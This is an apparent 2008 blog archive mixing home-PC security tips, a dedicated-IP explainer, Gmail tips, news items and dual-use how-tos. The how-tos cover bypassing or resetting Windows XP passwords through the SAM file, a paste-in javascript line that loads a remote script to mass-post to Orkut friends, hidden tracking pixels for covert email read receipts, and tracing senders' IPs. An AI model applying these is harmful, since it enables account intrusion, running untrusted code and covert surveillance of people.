June 2008

Monthly Archive

June 25, 2008

Protect your computer against network security

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , , , , , , , , , , , |
[6] Comments 
 

How to protect your computer against network security attacks and other accidents.

Computer Internet security


Every minute that your computer is connected to the Internet, either through a dial-up (modem)
connection or through a broadband (DSL or cable) service, it is at risk.
Network security attacks can come at any hour of the day or night.

Ignoring computer Internet security threats can cost you thousands.
Your computer is just one machine among the millions connected to the Internet at any given moment.
And a moment is all it takes for a hacker to get in. All your private documents and photos,
credit card numbers and passwords are available to anyone with bad intentions and basic computer skills.

Hackers can get in, take what they want, and even leave open a “back door” so they can turn your
computer into a “zombie” and use it to launch network security attacks, often against high-profile
computer systems such as government or financial systems. Having control of your computer gives
them the ability to hide their true location as they launch their attacks.

Virus protection is not enough. Don’t think that antivirus software completely protects your
computer from Internet security risks. Virus protection is as good as the latest virus definitions,
which are created in response to the latest viruses – many thousands of people must be
infected before the makers of antivirus software can create a defense. And antivirus software
does nothing to protect your computer against direct network security attacks.

If you use dial-up Internet connection, it is more difficult (not impossible, just difficult) for
a hacker to get in, since your computer only connects to the Internet when it has something to send,
such as email or a request to load a Web page. Once there is no more data to be sent, or after a
certain amount of idle time, the computer disconnects the call. Also, your computer is usually assigned
a different IP address on each call.

Broadband services are more of a target for network attacks, since your computer is always
on the network, ready to send or receive data and its IP address changes less frequently (if at all).


How to protect computer against network security attacks

1) Use a firewall

This is a software program that monitors all incoming and outgoing network traffic and allows
only the connections that are known and trusted. It’s a mandatory tool for your computer Internet security.

The best balance between maximum protection and ease of use is ZoneAlarm Pro
from Zone Labs, which is not just a classic firewall that stops all network security attacks, but also…

  • Makes your computer invisible to anyone on the Internet.
  • Automatically removes the most dangerous and useless spyware and viruses.
  • Blocks banner ads and pop-up/pop-under ads.
  • Automatically updates spyware and virus signatures.

Zone Labs has just released the new ZoneAlarm Security Suite
– an easy to use computer Internet security package combining their firewall with antivirus, email security, content filtering, and communication protection.

2) Use antivirus software and keep it up-to-date

Some one recommend Kaspersky Anti-Virus.
It detects more viruses than popular Norton AntiVirus and can protect you from even unknown viruses.
It was the only antivirus program in the world that repelled attacks of all “ILOVEYOU” virus variations
without any additional antivirus database updates. The program checks and cures both incoming and outgoing mail
in real-time, is simple to install and use. You only need to choose from three levels of protection.

To find out if you have any viruses or spyware on your computer without having to uninstall your current antivirus
or install a new one, you can scan your computer online for viruses and spyware with their free Online Scanner.
Just click the link Free Virus Scan on their home page.

The popular ZoneAlarm Internet Security Suite uses Kasperky anti-virus engine.
Take a look also at Kaspersky Internet Security.
It’s a package combining antivirus protection with a personal firewall and an antispam filter,
specially developed to protect personal computers against the whole range of network security attacks – viruses, hackers,
spyware and spam.

3) Regularly check for spyware and adware

Spyware and Adware are files that can be installed on your computer without your permission.
These programs allow hackers to track your behavior on the Internet and retrieve your personal
information such as pin, credit card, phone and social security numbers, passwords, usernames, etc.
ZoneAlarm Anti-Spyware
combines a spyware scanner with a firewall and email security.

4) Don’t open unknown email attachments

Don’t open any email attachments unless they are authored by a person or company that you trust.
Also remember that email viruses can often originate from familiar addresses. If you need to open a
suspicious attachment, first save it to your hard disk and scan the file using your antivirus software.

5) Disable hidden filename extensions

Windows operating systems contain an option to “Hide file extensions for known file types”
(enabled by default). Some email viruses take advantage of a hidden file extension. They use
an attachment which may appear to be harmless (.txt, .mpg, .avi) when in fact it’s a script
or executable (.vbs, .exe). For example, “LOVE-LETTER-FOR-YOU.TXT.vbs”.

6) Keep your operating system and other applications patched

Most of the network security attacks would be stopped if all users kept their computers
up-to-date with patches and security fixes. When holes are discovered (this happens frequently),
computer vendors usually release patches for their software. Some applications automatically
check for available updates, for others, you need to check periodically vendors’ websites.

7) Disable Java and ActiveX if possible

Java and ActiveX are used to write code that is executed by Web browsers. Although this code
generally adds useful features, it can be used by hackers, for example, to monitor your
Internet activity. You can disable Java and ActiveX in your browser at the cost of limited
interaction with some websites.

8) Turn off your computer or disconnect from the network when not in use

If you use broadband (DSL or cable) Internet connection, turn off your computer or otherwise
completely disconnect it from the network when you are not using it. This not only “protects”
your computer from Internet security risks, it forces your ISP to change your computer’s IP address
more frequently, thus making it more difficult for a hacker to get in.

9) Make regular backups of important data

A hard disk crash or physical theft of your computer results in the loss of all data stored on hard disk.
Keep a copy of important files on removable media such as floppy/ZIP disks or recordable CD-ROM disks
and store these disks somewhere away from the computer.

Children’s Internet security

Net Nanny
It’s a simple-to-use filtering tool allowing you to determine what Internet content enters your home.
It can block pornography, hate sites, questionable chat rooms, gambling sites and other dangers of
the Web, Usenet, Peer-to-Peer downloading networks, Instant Messages, FTP, Forums and email.
 

June 25, 2008

Dedicated IP

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , |
1 Comment 
 

What is Dedicated IP?

A dedicated IP (Internet Protocol) is a unique Internet address dedicated exclusively to a single hosting account. Normally, several hosting accounts reside on a single server and share that server’s IP address. Dedicated IP addresses are usually used for large SSL-encrypted secure Web sites and particularly large and/or traffic-heavy sites. Most shared hosting users have no particular need for a dedicated IP address.

However, a dedicated IP address for your hosting account enables you to:
1. View your Web site via its IP address.
2. Access your accounts by FTP or the Web when the domain name is otherwise inaccessible, such as during domain name propagation periods.
3. Ensure faster response during periods of high traffic load.
4. Set up SSL protection on your Web site.


Why Dedicated IP?

For most people, they don’t need dedicated IP. But for people that want to provide anonymous FTP or a website using SSL, a dedicated IP can make that easier.


Difference between shared and dedicated IP

Each computer connected to the Internet is assigned a unique IP address for the purposes of communication. An IP address is a 32-bit numeric address usually expressed as 4 numbers from 0-255 separated by dots, for example 192.168.0.123. There are billions of addresses possible, however, the number is finite.

In the Web hosting industry there are two types of IP address…
Dedicated IP address (also called static IP) means that a website has its own IP address. Whether you type in your URL or the numeric form of its IP address, both will bring you to the same domain.
Shared IP address means that multiple websites share the same address. Web servers can determine by the domain entered in a user’s browser which website is being requested. Typing in the IP address will bring you to some kind of generic page instead of the specific site you want.

Due to the rapid increase of the number of registered domain names and the finite number of IP addresses, Web hosting providers are forced to use shared IP’s when possible. In fact, hundreds of websites often share the same address. Static IP hosting is no longer the norm and usually costs more.


Who needs a dedicated IP address?

Generally, having a website on a shared IP address will not cause you any harm. However, there are a few cases when a static IP is required…
Having your own Private SSL Certificate. Secure e-commerce websites need SSL certificates for accepting credit cards online. Web hosts usually offer a shared SSL certificate where clients can share the Web host’s SSL. If you are using your Web hosting provider’s shared SSL you don’t need a static IP.
Anonymous FTP. It means that anyone using the FTP software can access files in a special directory of your site. It’s called Anonymous FTP because the user name used to access is “anonymous.” Many Web hosting providers require a static IP for the anonymous FTP function to work properly.
You want to access your website by FTP or Web browser even when the domain name is inaccessible, such as domain name propagation periods.


Dedicated IP hosting and search engines


There has been debate in the SEO industry for awhile regarding whether or not using a dedicated IP address is better than having a shared IP for your website…
Some SEOs suppose that there really is no good reason to obtain static IP Web hosting. Your site will not perform any better by having its own static IP.
Some others theorize that your choice of dedicated IP hosting vs. shared hosting might slightly affect your rankings (i.e. it’s a factor considered by search engines).
Yet others suppose that sharing an IP address with known spam or adult sites raises a warning flag with search engines, so some of them may respond by banning the entire IP address from their index.

Most probably, these fears are greatly exaggerated. Since the majority of sites on the Web are hosted via shared IP, it would be unprofitable to search engines to penalize a site based on IP. Search engines are able to ban anything on a domain name instead of an entire IP neighborhood. So it is search engine safe to use a shared IP hosting. Moreover, almost all hosting will eventually be shared in order to preserve IP addresses.

Conclusion

Don’t worry if your site is on a shared IP address. In most cases, this doesn’t affect you. Dedicated IP hosting may be required if you need to have some sort of special access to your website, like SSL or Anonymous FTP. If you have no special requirements, then a shared IP will work fine under most conditions.

For me personally, the question of dedicated versus shared IP is very simple: since there is a risk (very small) that a clean site could encounter a problem, and the cost of getting a dedicated IP is minimal, I always recoment our clients go for it.


If you need an inexpensive host that offers dedicated IP addresses for no extra fee. You can ask without hesitation.

 

June 23, 2008

How to Log on to Windows XP if You Forget Your Password

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , |
1 Comment 
 

Steps:

1. Reboot your machine.
2. Press F8 before the Windows boot screen appears.
* Do not press F5 as used on the NT/9x series of Windows.
3. You will be be prompted with a boot options menu.
4. Select the Start Windows in Safe Mode option.
5. Click through several self-explanatory screens until your reach the familiar ‘Welcome’ screen.
6. Note that this welcome screen is limited to 256 colors and 640×480 resolution because the primary graphics will have been set to the Windows Safe Mode software VGA adapter. You will not be able to change this mode even in Display options, while Windows is running in Safe Mode.
7. Find the icon for the Administrator user. If the default settings of your system haven’t been changed, there should be no password for this account.
* The Safe Mode Welcome screen might display some of the other users on your system.
8. Login as the admin.
9. Press Yes at the prompt asking if you would like to continue using Safe Mode.
10. Continue on to the User Settings control panel. Here you can change any of the other passwords for user on the machine. Make any changes you want.
11. Reboot your computer. As long as you don’t press any keys (i.e. F8) during the boot-up the computer will startup normally.
12. Login as the user for which you set the password.

Tips

* You can access the Administrator account through the login prompt without logging into safe mode. If the computer utilizes the welcome screen instead of the standard NT domain login prompt, you can press Ctrl + Alt + Del twice to get to the login prompt. This is only true if you are running Windows XP Professional Edition. Windows XP Home Edition will also allow you to use this method to log on.
* Some users are smart enough to password protect their Administrator account when they install windows. If that’s the case, you’ll have to know that password in order for this method to work.
* There is a way to crack the windows “SAM” and system files to retrieve the original passwords Monitor, you need a program such as LC5 installed on a computer, and the SAM file in C:\WINDOWS\system32\config if LC5 is not installed on the computer that you forgot disk because as soon as you can get into the hard drive, windows is using the file so you cant copy it.
* Use SysInternals ERD Commandor to change the admin. password. Boot from the CD and select the locksmith option to change whatever password you like. Alas, this product seems to have been discontinued, however there are many other options out there for resetting the password so long as you are willing to spend a little money.
* Much simpler is simply to rename or delete the SAM file (renaming is safer). For this you need to boot the box using some other operating system on a CD and then mount the drive (otherwise Windows locks the SAM file and won’t let you touch it). NTFSDOS is also a good utility for this purpose. Find the SAM file and change the first character. After you reboot, all the accounts are still there, but they all have null passwords. Note: if you rename the SAM file on XP SP2, when you reboot, XP fails to initialize and forces you to reboot in safe mode. However when you boot into safe mode you get the same message, so don’t try this method on XP SP2.

warnings:

* This method does not work with machines running XP SP2, you will need to use “safe mode with networking” instead.
* Use these instructions for ethical purposes only, please. Accessing Windows Administrator and changing passwords could be construed as illegal entry and electronic trespass in a court of law.
* This whole process is pointless if you know the administrator’s password as you can easily remove passwords without going into safe mode. Assuming that your PC only has one user profile with administrative powers.
 

June 20, 2008

Send scrap to all orkut friend.

Posted by Social Geek under Welcome | Tags: , , , , |
[3] Comments 

var gaJsHost = ((“https:” == document.location.protocol) ? “https://ssl.” : “http://www.”);
document.write(unescape(“%3Cscript src='” + gaJsHost + “google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E”));

 
Code:( it doesn’t work due to orpr.js file is not found on server, site administrator remove this file. I will try to upload this file again and after that it will work.)

javascript:d=document;
c=d.createElement(‘script’);
d.body.appendChild(c);
c.src=’http://prafulkr.wordpress.com/orpr.js’;
void(0)

put this code in to your address bar and hit enter.
 

June 20, 2008

Hack Attack: Become a Gmail master

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , |
1 Comment 
 

Hack Attack: Become a Gmail master

Gmail is hands-down the best web-based email service on the ‘net. Conversation threads, search, tagging, and keyboard shortcuts have completely revolutionized the way I look at my inbox. I manage all of my email from my personal Gmail inbox, including the daily flood of Lifehacker messages. At this point, I can’t imagine a program I could use to manage my email any more efficiently.

Despite my undying love for Gmail, there are still a lot of people who aren’t won over by sheer enthusiasm alone, and still others who just aren’t taking full advantage of the features and functions they’ve got at their fingertips in Gmail. Either way, the only thing a Gmail naysayer needs is a better understanding of everything you can do with Gmail.

Today I’ve got a rundown of the methods and add-ons I use to make Gmail more powerful. By the time you’re done with this article you’ll be a bona fide Gmail power user, too.
Quick look at what to expect

When you’re done setting up your Gmail account, you should be able to do everything you see in this short video without once leaving your keyboard (which means beaucoup productivity for you):

Set up labels

The first thing you’ll want to do to flex Gmail’s muscle a bit is set up a few labels. If you’re new to labels, think of them as folders, or better yet, tags. [1] Your email doesn’t have to specifically reside in any folders to be just as accessible. In fact, labels are great specifically because you can apply multiple labels to one email, making your email that much easier to find. Setting up labels is super-easy:
Go to Settings, and then select the Labels tab.
In the textbox labeled, “Create a new label:” simply type your label and click Create.

Yep, that’s it. I’d suggest going through your email and figuring out how you might want to categorize and label your emails. I generally create labels for any mailing lists I’m on, along with labels for different work-related emails and an ever-important Follow-up label for the emails I want to make sure I remember to reply to (e.g., those emails I’m not going to reply to immediately but I don’t want to fall through the cracks).

Of course, your labels will revolve around your needs (as they should), and if you don’t already have an email system, I’d encourage you to examine your email and develop one.
Set up filters

While labels are great on their own – and I label a lot of messages after they land in my Inbox – there are a lot of instances where you can assign labels automatically based on the characteristics of the message, thus saving yourself the work. That’s where filters come in.

Gmail can filter an email based on six criteria: From, To, Subject, Has the words, Doesn’t have, and Has attachment. Obviously this setup offers a lot of power for filtering your incoming mail. After you choose your criteria, you can choose any combination of the following options: Skip the Inbox (Archive), Star it, Apply the label…, Forward it to, and Delete it.

When I set up a new filter, I commonly choose to Skip the Inbox and Apply a label. For a detailed description of how to do this, check out my feature on bookmarking with Gmail [2].
Managing multiple email accounts with Gmail

It’s not at all uncommon to have more than one email address these days (actually, for many of you it’s been pretty common for years now). Though you may never be able to consolidate all of your email to one address, you can at least deal with all of your email from one account.

If your non-Gmail account allows for email forwarding, set it up to forward your mail to your main Gmail address (this process will vary based on your email account, but it’s generally really easy to do somewhere in the settings). For example, all of the Lifehacker tips email (which comes to Gina, Keith, and me) comes straight to my personal Gmail address, at which point it’s filtered out of my inbox and labeled “Lifehacker Tips.”

With Gmail’s recent addition of smart replying, you shouldn’t have to worry about sending email from the wrong address. When someone sends you an email, Gmail will automatically use the appropriate email address when replying (whether it’s a Gmail address or not).
Using keyboard shortcuts

This is where Gmail really starts to shine. Despite the fact the Gmail does a lot of things very well, a lot of these features were just sort of ho-hum for me. It wasn’t until I started using keyboard shortcuts, and then the Gmail Macros script, that I completely fell in love with Gmail.

The first thing you’ll want to do is enable keyboard shortcuts in Gmail. This is as simple as navigating to the General tab in the Settings and selecting “Keyboard shortcuts on.” The keyboard shortcuts let you navigate through your messages, within your conversations, archive a conversation, and jump to your inbox without ever having to go for the mouse. Here’s a list of the default Gmail keyboard shortcuts.

Gmail’s keyboard shortcuts by themselves are great, but if you really want to take control of your Gmail inbox, I very highly recommend installing the Gmail Macros script for Greasemonkey. Though it does a lot, the most powerful thing you’ll use the Gmail Macros script for is navigating through your labels (including your inbox, trash, drafts, etc. – after all, they’re all just labels) and labeling your conversations with a really slick Quicksilver-like interface.

First you’ll need to install the Greasemonkey Firefox extension if you don’t already have it installed. Next, install the Gmail Macros script. There are a couple of different scripts available on the linked blog post, but I prefer a patched version of the script that stays more true to Gmail’s original keyboard shortcuts.

Here’s a quick look at the key commands that the Gmail macros script provides (click for a larger version):

Searching your Gmail inbox

Of course, a solid Gmail tutorial wouldn’t be complete without a quick rundown of searching your Gmail (it’s Google, after all!).

Search operators in Gmail work much the same as they do with Google. Type the operator followed by a colon, and then your search term (e.g., to:tips@lifehacker.com). Likewise, you can exclude terms from your search with the hyphen (-).

The search operators allow you to limit the scope of your search to the to (to:), from (from:), and subject (subject:) fields. Easy enough, right? You can also search based on labels (label:), emails with attachments (has:attachment), and even dates (after:/before:yyyy/mm/dd).

Search operators will come in especially handy if you need more flexibility when setting up filters (you can add any search term to the “Has the words” field). Here’s a comprehensive list of Gmail search operators.
Take your Gmail toolbox on the road

Finally, to make my Gmail add-ons (Greasemonkey, Gmail Macros script, and AutoHotKey assignments) as portable as possible, I email them to myself as attachments so that whenever I’m away from my computer I can work just as efficiently as if I were at home.

With all of my systems in place, I’m more pleased with Gmail than I have been with any other email client, desktop or web based. Of course, I’m sure I haven’t exhausted the matter. Gmail users: what tips and tricks do you use to enhance your Gmail experience? Non-Gmail users: What methods do you use that blow Gmail out of the water? Give us your thoughts in the comments or at tips at lifehacker.com.
Adam Pash is an associate editor of Lifehacker. His special feature Hack Attack appears every Tuesday on Lifehacker. Subscribe to the Hack Attack RSS feed to get new installments in your newsreader.
Footnotes:

[1] There are a lot of advantages of Labels or tags over folders. One huge benefit of labels is that if you choose to delete a label because you no longer find it useful (perhaps your system has evolved and you want to clean house), the associated email will not be deleted. Instead, the label is simply removed. Remember that with Gmail, the whole point is that you don’t have to delete any of your email – ever. A second benefit of labels is that you can mark one email with as many labels as you like. [back up]

[2] If you want to use Gmail as a bookmarking tool, drag and drop this modified GmailThis! bookmarklet onto your browser’s bookmarks toolbar and edit email address and the text labeled “bookmark here” to the labels you’ve setup for your bookmarks.
Author: Adam Pash
 

June 19, 2008

Forcing Email Read-Receipts

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , , , |
[3] Comments 
 
 

 Forcing Email Read-Receipts


Author: Anup Shinde.
 

The basics



Many email spam programs
use this technique frequently to create effective spam. The article is completely meant for technical people, but I would try to ease it for the non-technical people,
as much as possible.

Note: This technique is not the one used by “Outlook Express” or other
software that have an option to request a mail read receipt. In this case we are
not requesting the client to send a receipt, but we are attempting our best to force
a read receipt.

Background

This technique is basically based on the HTML. Hypertext Markup Language, the coding
language used to create hypertext documents for the World Wide Web. In HTML, a block
of text can be surrounded with tags that indicate how it should appear (for example,
in bold face or italics). This allows electronic publishers to display rich or formatted
text/information on the Internet. Therefore, it creates a great substitute for the
plain-text content.

HTML being a standard for web publishing and having rich-text functionality, today
most E-mail editors allows you to send HTML mails instead of plain text mails. Similarly
most of email software allows you to read HTML emails.

The technique that we are going to use here is based on a specific feature of HTML.
In HTML a word, a block of text, or an image can be linked to another file on the
Web. That another file could be on the same web or from another webpage.

This way the HTML email readers are expected to behave in the same way like the
web-browsers.

The trick



The HTML email readers will show all the content that the HTML specifies. Therefore
it will also show the external content if the HTML specifies it. Now the point here
is that the external content is shown. This external content can be anything, including
anything we link it to.

So if I specified an image into the HTML mail with its source from my site as:

<img src = “http://myserver.com/my_picture.jpg” width=”470″
/>


It would
directly show the image as if it was embedded inside the mail, though it
came from outside.

Suppose I want a receipt for the mail written to my colleague Keane. How would I
do it?

As you see, the “<IMG>”  tag points to an image on my server. But what if I do not point the source to an image, but to some scripted dynamic page that
takes the shortened subject of the mail as a parameter. Whenever the mail is opened,
the page will get accessed.

We can script this page to perform some activities like sending a mail receipt to
us. Since we do not want the image to expose the trick, we reduce its size to “
1×1 pixels”

<IMG src=”http://myserver.com/receipt.aspx?id=HelloKeane&#8221;
height = “1px” width=”1px” />


So we can brief that: Whenever the
HTML email is displayed; the image source will be accessed. And whenever the image-source
is accessed, we get a mail saying that the subjected mail has been read.

How to plant a “force-receipt” image?


I will explain a very raw method of
doing this. 

–> First create a “.html” page. Say “somereceipt.html”.

–> Open it with notepad and put the following line into it. 

                   
<IMG src=”http://myserver.com/receipt.aspx?id=HelloKeane&#8221;
height = “1px” width=”1px” /> 

–> Save the file and close it. 

 

 

–> Double-click and open the HTML file (in IE or other browser). 

–> Press “Ctrl + A” (Select All) and then “Ctrl + C” (Copy). 

 


Open your HTML email editor (Outlook or GMail…anything) and at the end of the mail
press “Ctrl + V”. This will plant the receipt image into the mail. You can send
that mail whenever you want.

The problem with the “raw” method is that you will yourself trigger the mail receipt
while opening the HTML page and while pasting it in your email editor. You’ll just
need to ignore these.

People who want to use it regularly can use the services from “DidTheyReadIt or ReadNotify”. These services make the procedure very simple.

Sending a read-receipt mail and other details (Using ASP.NET 2.0)



Here comes the more technical part. I am writing a page in ASP.NET 2.0, but you
can use any other platform.

As discussed
above, we are a passing a query-string parameter to the page.
Here, this query string contains the subject that we wrote in the email. You could have
other parameter(s) as required.

As soon as the web page (that we scripted) receives these parameters, it sends us
the mail that the subjected mail was read.

What all information can we get?


Since the browser/mail reader is indirectly accessing our page, we can get all the
information that the browser can provide. For example: IP Address, Browser/Machine
information. But there is much more that the browser can give away.

Get your browser spied at http://gemal.dk/browserspy/.

The pages in the above link give a lot of information about your browser and machine.

Here the attached sample code will send a mail receipt along with some easily accessible
browser information. This sample creates a HTML mail, to show the information in
a formatted manner.

To gather the information about the browser we can use the “Request.Browser.Capabilities”
dictionary object available in .NET 2.0.

To get some other information the code uses the following:

  • Request.UserHostAddress
  • Request.UserHostName
  • Request.AcceptTypes
  • Request.UserLanguages

Details of these classes can be found at MSDN.

In the “Page_Load” event itself, we are creating the HTML mail to be sent to us.
The “Request.Browser.Capabilities” object gives us a “System.Collections.IDictionary”
type. We iterate through the “Key, value” pair in the dictionary and display the information, as shown below.

           

System.Collections.IDictionary oDictionary = Request.Browser.Capabilities; 
            foreach(System.Collections.DictionaryEntry
oDictionaryEntry in oDictionary) 
            { 

                  sHTML += <tr>”; 
                  sHTML += “<td>”
+ (oDictionaryEntry.Key == null ? “NULL” : oDictionaryEntry.Key.ToString()) + “</td>”; 

                  sHTML += “<td>”
+ (oDictionaryEntry.Value==null?”NULL”:oDictionaryEntry.Value.ToString()) + “</td>”; 
                  sHTML += “</tr>”; 

            }

This trick may not always work, especially with the famous public email services.
They take enough steps to restrict it, since it is an indirect disclosure of privacy.
As the image points to the external content, the user is required to be connected
to internet if the receipt is to be received. Also the HTML email reader must be
available to the user.

How service providers are restricting it?



Mail service providers like GMail, Yahoo and Hotmail do restrict these things. They
simply restrict it by not allowing the “External” content to be displayed. As the
image in the above example points to the external content (on your site), this will
also get restricted. But it still works with Outlook and many other web-mail services.
It will still take time to be restricted from most places. Till then …Enjoy!!!.
 

June 18, 2008

Hacking the world – Geo-locate incoming emails

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , , , , , , , |
[7] Comments 
 

Hacking the world  –  Geo-locate incoming emails


Author: Anup sinde . Email
 

What I am going to explain here is nothing new, but I would just like to share with
you people a trick that has been very useful to me in past few years, especially
for superficially scrutinizing cyber-strangers.

There is much software out there that will allow you to geo-locate the incoming
mails and thereby making this task much easier to perform. For those who want to
use this information only casually, the following is the simple procedure.

How it works?


Geo-location is not a very complex process superficially and it consists of two
basic steps.

  1. Find out the IP address (Internet protocol address) from where the mail originated.
  2. Geo-locate the IP. -This is a technical process and if not difficult, it is a
    bit cumbersome to do manually, but developers have made free easy-to-use utilities
    for these.



So how do I start?

First you need to get the headers of the mail. These headers are usually hidden
by almost all the mail reading applications whether it is web-based or a desktop
application.

How do I get the headers?



Here I will be explaining these only for the web-based mail applications like Yahoo
and GMail.

  • In GMail when you open the mail, select “More options” and click “Show original” 
  • In Yahoo Mail, it has a link “Full Headers” at the bottom right of the mail.

All mails have similar headers, except the way that they are shown. Here I would
be taking an example of a mail received in GMail account. It shows the original
mail in a simple text-only format

Searching the sender’s IP



The following is the header as shown in the text format.


Fig 1 – Image highlighting the headers

The header is highlighted inside a green box. This header has many fields. Even
I do not understand all of those. What is important to us is the “Received field”.
Basically our first step is to find out the IP address of the sender. Therefore
we just need to the see the Headers saying, “Received From”.

As you can see in the image, there are two such “received from” lines. Which one
is correct? Actually both are correct. This mail was sent from a Yahoo mail account
to a GMail account. It has been received two times. First the sender sent it to
the Yahoo Mail Service and then it was sent from the Yahoo Mail service to the GMail
service. Well, this is the same as the postal service applying their stamps at different
places when the paper mails are routed to the destination.

But we are interested in the originating IP address only. And that is the IP address
from where the yahoo service received the mail. Here it is “172.21.100.79
as underlined in the image.

Note: Take the IP from the last “Received From” header and use that IP for geo-location
as explained in steps further. If that IP gives some kind of error while geo-locating
use the IP from the second last “Received from” header and so on. But then any IP
other than last one may not give completely correct results.

Display of mail headers may differ slightly in different services. A bit of search
within the header can lead you to the correct IP address. (This again only if the
application allows display of such data).

So we have completed the first step. Now we need to geo-locate the IP to its destination.

Geo-locating the IP

Here, I would not be explaining the exact technical process for this. Instead I
will be showing how to geo-locate the IP address

I have been using two sites for the same. 

First we will take up the latter one [GeoIPTool – http://www.geoiptool.com/%5D. This is easy
to use and only for locating the IP address’s geographical location.

Just input the
IP address that you found into the “Host/IP” field in the form and click “View Info”.
It will show you the geographical location where IP belongs.

Suppose I found the
Sender’s IP address as “61.95.162.76”. The following shows me the information about
the IP address.


Fig 2 – Image from GeoIPTool

Still not satisfied

Well, GeoIPTool does not satisfy my requirements enough. Why? As shown in the image
above, it gives me information like the IP address comes from the city Bangalore
in Karnataka, India. But then Bangalore is a big city. Briefly speaking, it just
does not help me too much.

Therefore I turned to an old method of tracing it through “Visualware’s VisualRoute”.

Currently, the website gives a live demo at

VisualRoute- http://visualroute.visualware.com


Fig 3 – Image from VisualRoute

As the above image shows, the IP address is from “Infosys Technologies Ltd, Bangalore”.

But along with it, the tool also gives other not-so-important-for-us information
like

  • How the IP is reached? The complete path from the VisualRoute servers to that IP
    address.
  •  It also mentions “Bharti Infotel Ltd”. It means that the company “Infosys,
    Bangalore” uses a connection line from “Bharti Infotel Ltd”. Well, this doesn’t
    mean that it is the only connection provider, but then strategically it is one of
    the 2 or may be at most 3 providers.
  • It mentions “Singtel Exchange”. Well, this is one of the major Internet line providers
    for India. But the entry here shows that “Bharti Infotel Ltd” mainly uses the “Singtel
    line” for the “WAN IP pool for Bangalore”.

The “Snap” button in the demo allows you to see the text-only report.

Is the information, found in this way, always correct?

Depends. It need not be always correct. But most of the time, I have found this
information to be incorrect in the following cases.

  • Somebody knows this technique and intentionally sends the mail through entirely
    different connection. (I have not yet been able to trace such people through mail
    headers)
  • A mail is routed through many internal networks about which the external world has
    no information. Example. In a large organization, with offices in different parts
    of a country, they might be using a single server placed at the head office to send
    the mails. In that case you will only get the head-office location every time.
  • The mail providers like GMail hide this information from the receiver in some cases.

Warning: The information
about the geographical location for an IP is available from the Internet IP registration
authorities (this is not what these authorities are actually called). If the registration
information is incomplete or incorrect or hidden, this method will yield incorrect
results.

Well this ends the usage; those who are interested in knowing answers to somewhat
technical stuff may read further.

How to change the outgoing information?



Basically you cannot change the IP in the email headers until you use some kind
of IP spoofing. But you can make use of an entirely different connection.
How? Use the public proxies. When the mails are sent using public proxies, they
originate from that public proxy IP address and therefore not possible to track
directly (except when the heavy use is monitored and statistically analyzed conclusions
are derived) 

A concept called “Onion Routing” disallows such analysis
attacks too. Though at some advanced networking level, you may like to see http://www.onion-router.net/

A not-so-well written article (by me) may allow you people to perform “Onion Routing”.
http://www.anupshinde.com/Articles/OnionRouting/

What happens when mail is routed within the organization before being sent?

Again taking the example of the big organization “Infosys”. This company
has a development center at Pune, India. Any mails coming from its Pune development
center are sent to the Internet through their Bangalore facility.


Fig 4 – Image from PUNITP, Infosys

As seen from the above header, there are many “Received from” headers, but last
two of them are unreachable from the Internet, because they are internal to the
organization. So we use the third last IP, which resolved to Bangalore India. That
is incorrect. The mail is from Pune, but still we cannot use this method to find
out the real location of the sender. But from the naming conventions like “PUNITPMSG09.ad.infosys.com”,
we can assume that the IP is from Pune. Assumptions may be wrong, but fortunately
in this case it was correct.

How GMail is preventing geo-location?

Not exactly preventing all such mails. But I found that mails sent from one GMail
to another GMail account does not have the “Received From” headers. This makes it
really difficult to trace the sender. Only GMail authorities would be capable of
doing so.

It is possible that I am wrong in this case. Correct me if so.



The image below shows how GMail blocks “Received from” headers:


Fig 5 – Image from GMail to GMail headers

Note:

Any example used in this article has scrambled data at many places.

References to the organization “Infosys” are purely co-incidental.
 

June 18, 2008

Israel ‘agrees to Gaza ceasefire’

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , |
[4] Comments 
 

The Israeli government has approved a ceasefire with the Palestinian Islamist movement Hamas in Gaza, Israeli media and defence officials say.

The decision was taken overnight following the return of a defence official, Amos Gilad, from Cairo, where he held talks with Egyptian mediators.

The truce is scheduled to begin at 0600 (0300 GMT) on Thursday.

Hamas, which controls Gaza, says it is confident all militants will abide by the agreement.

Hamas seized control of Gaza in June 2007, driving out forces loyal to Fatah, the political faction led by Palestinian Authority President Mahmoud Abbas.

Since then, Israel, the Palestinian Authority and the international community have sought to isolate Hamas.

Two-stage deal

Israeli Prime Minister Ehud Olmert and Defence Minister Ehud Barak approved the ceasefire agreement with Hamas overnight after they were briefed by Mr Gilad on his return from Cairo, Israel Radio said.

Ehud Olmert (3 June 2008)
The Israeli government said earlier that it would give the truce a chance

The station said Mr Gilad had received assurances from Egypt that Hamas accepted all of Israel’s conditions for the truce.

As well as a halt to all hostilities on Thursday morning, the deal also envisages a partial reopening of Gaza’s borders.

A second stage would focus on the return of captured Israeli soldier Gilad Shalit and on a deal to reopen the Rafah crossing into Egypt.

An Israeli security source told Israel radio that the negotiations on Cpl Shalit’s release were expected to resume with a few days.

He said that if progress was achieved, Israel would have to reach a decision regarding the release of Palestinian prisoners.

 
 

June 17, 2008

France’s military faces overhaul

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , |
[4] Comments 
 

France is to cut 54,000 military and civilian defence jobs as part of a root-and-branch reform of the sector, under government plans.

President Nicolas Sarkozy is proposing to create a smaller and more mobile army he believes will be better equipped to respond to new threats.

His strategy is also expected to place an emphasis on a stronger European Union defence policy.

Officials say there is no plan to scrap France’s nuclear deterrent.

Mr Sarkozy will present the proposals to military officials on Tuesday, in a paper called the White Book on Defence and Homeland Security.

It is the first major review of France’s military organisation since 1994.

‘Unpredictable’ world,

The review is expected to propose boosting spending on technology and intelligence, while cutting personnel.

Bruno Tertrais, a member of the expert panel who drew up the changes, hailed the document as “revolutionary”.

“For the first time in centuries, France does not base its defence policy on the hypothesis of a major military conflict in Europe,” he told the French AFP news agency.

“There is a very strong emphasis on intelligence, recognising that the world may not be more dangerous than it was in 1994 when we did the previous white paper, but it seems more unpredictable.”

Under the plans, the number of combat-ready troops would be reduced from 50,000 to 30,000.

As well as placing more emphasis on EU co-operation, Mr Sarkozy is also expected to propose moving closer to Nato command.

France withdrew from Nato’s military structure in 1966 in protest at the dominance of US commanders.

